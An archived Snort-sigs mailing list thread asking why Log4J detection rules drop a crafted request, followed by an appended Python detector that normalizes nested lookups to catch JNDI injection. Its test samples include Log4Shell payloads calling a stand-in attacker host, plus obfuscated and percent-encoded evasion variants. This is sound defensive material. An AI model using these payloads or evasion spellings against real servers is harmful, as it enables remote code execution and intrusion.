Snort mailing list archives

Re: Additional Info on Log4J Rules


From: Joel Esler via Snort-sigs <snort-sigs () lists snort org>
Date: Mon, 14 Feb 2022 20:14:39 -0500

Those are the official docs

On Feb 14, 2022, at 6:15 PM, Chapman, Sean via Snort-sigs <snort-sigs () lists snort org> wrote:

Hello all,
I'm looking to find out if anyone has information on the logic behind some of the Snort rules associated with Log4J detection. I can successfully trigger these rules by sending a crafted GET request with a jndi:ldap:// query in the header, and then the 5 rules (58723, 58726, 58737, 58742, 58743) are triggered on the Firepower appliance and the packets are dropped, but I cannot find anywhere that says WHY the packets are dropped beyond that it's detecting rules for Log4J exploitation.
The 5 all have the same level of detail listed, such as this one:
https://www.snort.org/rule_docs/1-58723
Any docs or places I missed to look for the details would be super helpful.
Thanks!
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists snort org
https://lists.snort.org/mailman/listinfo/snort-sigs

Please visit http://blog.snort.org for the latest news about Snort!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette

Visit Snort.org to subscribe to the official Snort ruleset and make sure to stay up to date to catch the most emerging threats: https://snort.org/downloads/#rule-downloads

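The question above is about why a request carrying a jndi:ldap:// lookup in a header trips the Log4J rules. The rule documentation does not spell out the content matches, and the following is not the Talos rule logic; it is an added illustration, not from this thread or the Snort ruleset, of the detection problem such a rule has to solve: find a Log4j JNDI lookup in any HTTP header or in the request line, including the nested-lookup spellings (${lower:j}, ${upper:n}, ${::-d}) attackers use to split the string "jndi" so that a plain substring match misses it. The three sample requests, the hostnames and the header names are constructed for the example.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further braces inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# A JNDI lookup after normalization: "${jndi:<scheme>:...", any letter case.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _resolve_inner(match) -> str:
    """Resolve one innermost lookup the way an attacker relies on Log4j doing it.

    Only the three forms commonly used to split up "jndi" are handled:
    ${lower:X}, ${upper:X} and the default-value form ${...:-X}. Anything
    else, including the jndi lookup itself, is left in place.
    """
    body = match.group(1)
    if ":-" in body:                        # ${::-j} or ${env:NOPE:-j} -> "j"
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):   # ${lower:J} -> "j"
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):   # ${upper:n} -> "N"
        return body[len("upper:"):].upper()
    return match.group(0)


def normalize(value: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(_resolve_inner, value)
        if resolved == value:
            break
        value = resolved
    return value


def parse_request(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP request into its request line and (name, value) headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def find_jndi_lookups(raw: str) -> List[Tuple[str, str, str]]:
    """Return (location, scheme, normalized value) for every JNDI lookup found.

    The request line is checked as well as every header, since the lookup can
    be planted in the URI or query string just as easily as in User-Agent.
    Percent-encoding is removed first so "%24%7Bjndi" is seen as "${jndi".
    """
    request_line, headers = parse_request(raw)
    hits = []
    for where, value in [("request-line", request_line)] + headers:
        norm = normalize(unquote(value))
        for m in _JNDI.finditer(norm):
            hits.append((where, m.group(1).lower(), norm))
    return hits


def should_drop(raw: str) -> bool:
    """Inline verdict in the spirit of a drop rule: any lookup means drop."""
    return bool(find_jndi_lookups(raw))


# Constructed sample requests (not captured traffic).
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: app.example.test\r\n"
          "User-Agent: curl/7.88.1\r\n\r\n")
PLAIN = ("GET /index.html HTTP/1.1\r\nHost: app.example.test\r\n"
         "User-Agent: ${jndi:ldap://attacker.example.test:1389/a}\r\n\r\n")
OBFUSCATED = ("GET /index.html HTTP/1.1\r\nHost: app.example.test\r\n"
              "X-Api-Version: ${${lower:j}${upper:n}${::-d}i:"
              "${lower:LDAP}://attacker.example.test:1389/a}\r\n\r\n")
ENCODED = ("GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example.test%3A1099%2Fa%7D"
           " HTTP/1.1\r\nHost: app.example.test\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("benign", BENIGN), ("plain", PLAIN),
                       ("obfuscated", OBFUSCATED), ("encoded", ENCODED)]:
        print(label, "drop" if should_drop(req) else "pass", find_jndi_lookups(req))
```

The normalization step is what a substring match for "jndi:ldap" on the raw header cannot do: in the obfuscated sample the string "jndi" never appears on the wire, yet the server-side Log4j evaluates the nested lookups to exactly the same ${jndi:ldap://...} the plain sample sends. A detection that only matches the literal text is therefore easy to bypass, which is one reason an IPS applies several rules with different matches rather than one.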
